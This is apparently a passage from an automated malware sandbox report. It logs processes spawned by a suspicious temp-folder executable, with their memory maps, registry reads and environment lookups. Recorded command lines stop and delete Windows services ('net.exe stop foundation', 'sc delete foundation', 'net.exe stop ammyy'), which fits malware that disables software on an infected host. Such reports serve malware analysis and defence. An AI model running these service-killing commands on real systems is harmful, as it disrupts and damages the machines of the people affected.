2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xb64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4abe0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:12 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10926528 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000424 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #12: cmd.exe
56
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C net.exe stop foundation |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbac |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
948
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00717fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x01caffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01ff2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4abe0000 | 0x4ac2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x74bc0000 | 0x74bc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Get Info | net.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0x540, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4abe0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:12 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10926575 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #13: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C sc delete foundation |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001e0000 | 0x00246fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001bd0000 | 0x01bd0000 | 0x01f12fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01f20000 | 0x021eefff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4abe0000 | 0x4ac2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x74bc0000 | 0x74bc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0x938, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4abe0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10926778 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000424 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #14: net.exe
0
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\net.exe |
| Command Line | net.exe stop ammyy |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:13, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
